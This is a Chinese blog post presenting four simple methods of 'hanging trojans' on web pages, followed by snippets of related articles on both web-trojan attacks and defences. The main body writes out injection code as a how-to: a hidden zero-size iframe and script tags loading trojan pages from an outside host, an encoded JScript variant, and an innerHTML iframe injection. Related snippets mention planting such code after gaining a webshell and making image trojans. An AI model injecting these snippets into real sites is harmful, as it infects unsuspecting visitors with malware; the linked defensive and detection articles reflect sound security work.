正确的4种挂马方式(属于比较简单的)

最新推荐文章于 2021-06-17 01:29:55 发布
最新推荐文章于 2021-06-17 01:29:55 发布
阅读量544 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 技巧文摘 文章标签: iframe 加密
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/rjgcwl/article/details/2044787
本文介绍了四种常见的网页挂马方法,包括直接使用iframe标签加载木马页面、通过JS脚本加载、JS加密变形以及利用JavaScript动态添加iframe元素等方式。这些方法在网络安全防护中作为反例被提及。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

正确的4种挂马方式(属于比较简单的)
一、最简单的也是最有效的
<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe> 

二、js挂马

<script src=http://www.xxx.com/muma.js></script> 

三、js变形加密

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script> 

muma.txt可改成任意后缀的。

四、不是嵌入了与iframe不同

top.document.body.innerHTML top.document.body.innerHTML '/r/n<iframe src="木马地址"></iframe>'' 


 
常见挂马方式
12-21
常见挂马方式
教你如何挂马
chenrongde的专栏
10-09 2103
教你如何挂马方法一: 一般在你入侵了一个站拿到了webshell的时候。最常见的 挂站代码如下 : 把以上代码插到对方网页代码中,那么下次别人浏览了那个站点就会自动转向_blank>http://192.168.1.3/inc/joke.htm。而_blank>http://192.168.1.3/inc/joke.htm也就是我门的网页木马了,那width="0" height
正确4挂马方式(属于比较简单) - 京华志
10-04
值得注意的是,这些所谓的“正确挂马方式”实则是非法入侵行为,因此在撰写过程中,我们旨在提供教育意义,帮助读者了解并防范此类网络攻击手段。 ### 一、通过`<iframe>`标签进行挂马 #### 原理介绍 `<iframe>`...
WebSec 1.0: 防止PHP网站挂马的利器
- **简易操作**:使用方法简单明了,一般用户可以通过简单的引导完成操作,无需深入的技术知识。 ### 额外知识点 - **PHP**:一种广泛用于服务器端开发的脚本语言,被广泛应用于网站开发,故PHP网站较易成为挂马...
批量处理工具:清除文件夹内文件被挂马代码
- 确保替换字符串的准确性:在寻找并替换挂马代码时,要确保正确识别恶意代码的特征,避免误删正常代码。 - 测试修改效果:修改完成后,应在安全的环境中测试修改结果,确保恶意代码已被清除,同时网站功能正常。 ...
网页挂马攻击检测工具深度评测:性能与准确性
网页挂马攻击是一种通过嵌入恶意代码到网页中以窃取信息或控制系统的行为,对网络安全构成严重威胁。本文首先概述了网页挂马攻击的基本概念,并深入探讨其理论基础,包括攻击机制和检测理论。随后,文章实践性地评估...
网页挂马攻击案例全解析:追踪攻击背后的真相
网页挂马攻击是一种常见的网络威胁,其攻击者利用网页作为传播恶意软件的载体,对用户计算机系统进行非法控制。本文首先概述了网页挂马攻击的基本概念及其常见类型,随后深入探讨了挂马攻击的技术原理,包括恶意脚本...
多种挂马方式(申请加精)
weixin_33939843的博客
12-22 141
这里我拿挂首页index.asp来举例子。    先说一说,得到webshell的挂马方法  一般的挂马的都是用框架,这是最基本的挂马方式,只要不破坏原有的语言逻辑,那就想插入哪里就写哪里了,最基本的语句当然是<iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>,其中[u...
排查挂马使用到的命令
chengwa9834的博客
04-07 120
top find./-mtime0:返回最近24小时内修改过的文件。 find./-mtime1:返回的是前48~24小时修改过的文件。而不是48小时以内修改过的文件。 ll-t|head-n10:查找最近创建的10个文件 使用命令ls-l...
网页挂码方式html css,CSS代码解决网页挂马问题
weixin_33740988的博客
06-17 313
两行CSS来解决,共5种方案一、iframe{n1ifm:expression(this.src=‘about:blank’,this.outerHTML=‘’);}/*这行代码是解决挂IFRAME木马的哦*/script{nojs1:expression((this.src.toLowerCase().indexOf(‘http’)==0)?document.write(‘木马被成功隔离!’):...
网站图片挂马检测及PHP与python的图片文件恶意代码检测对比
weixin_34418883的博客
12-06 1014
前言 周一一早网管收到来自阿里云的一堆警告,发现我们维护的一个网站下有数十个被挂马的文件。网管直接关了vsftpd,然后把警告导出邮件给我们。 取出部分大致如下: 服务器IP/名称木马文件路径更新时间木马类型状态(全部) *.*.*.* /path/*144.gif 2017/8/7 5:53 Webshell 待处理 *.*.*.* /path/*...
图片木马制作的三种方法
热门推荐
whatday的专栏
01-25 6万+
1.Copy命令制作 1.asp内容: 打开cmd,数据一下命令: 此时打开两个jpg文件,相比: 且打开2.jpg可以像1.jpg一样显示图像。 把以下代码放入目标网站,即可按asp执行。 2.Uedit32 本制作来自于:雪糕。 我们通常在得到webshell之后都想给自己留
了解IFRAME框架挂马以及相应的防范方法
徐小西的专栏
02-05 595
当前网络安全最大的危险是什么?很多人都会说是网页挂马。没错!为了大规模盗号,挂马的网页在去年数以千万计的增长。普通网民知道怎么在电脑中防范网页挂马就可以了,从事和想从事与网络安全相关工作的朋友就要多掌握一些知识,知道网页挂马到底是怎么进行的,有哪几种方式。知己知彼,就会更好地维护网吧、网站等,就会增加自己的安全技能,逐渐成长为一名安全工程师。  一名优秀的安全工程师,要能独立负责网站安全、局域
一行代码解决iframe挂马
weixin_30394633的博客
01-07 170
相信大多数朋友都是iframe木马的受害者,有朋友的网站被注入了N回iframe,心情可想而知。而且现在ARP攻击,注入iframe也是轻而易举的事,仅局域网里都时刻面临威胁,哎,什么世道。 灵儿曾经在经典论坛上发过贴子:《一行代码解决网站防挂IFRAME木马方案》http://bbs.blueidea.com/thread-2785512-1-1.html ,有不少朋友都联系了灵儿,有的表...
挂马方法和技巧详解
北冥
03-28 1868
(1) HTML挂马法。   常规的HTML挂马方法一般是在网页中插入一条iframe语句,像。查看站点是否被挂,一般是查找一下关键词iframe(2) 再隐藏一点的就是js挂马了。  像再原来的网页中写入 ,horse里的js写法一般为 document.write(’http:\/\/www.xxx.com\/horse.html’>;,或者专业一点的写法是 top.document.b
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值